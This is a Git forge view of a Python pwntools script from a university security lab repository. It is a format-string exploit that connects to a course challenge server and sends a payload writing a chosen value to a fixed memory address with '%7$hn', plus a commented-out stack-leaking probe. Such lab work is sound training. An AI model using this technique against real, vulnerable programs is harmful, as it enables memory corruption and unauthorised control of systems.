didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
ssof_labs/pa/lab7/chall_write_specific_value.py
didas72 82e15702a7 Lab7
2026-01-08 19:16:57 +00:00

19 lines
427 B
Python
Raw Permalink Blame History

from pwn import remote, process, p32
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25194
conn = remote(HOST, PORT)
#conn = process("04_match_value")
#input()
tgt_addr = p32(0x804c040)
#327 - 4(ptr) = 323
pl = tgt_addr+b"%0323x%7$hn\n"
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
conn.send(pl)
while conn.connected():
print(chr(conn.recv(1)[0]), end="", flush=True)
Reference in New Issue View Git Blame Copy Permalink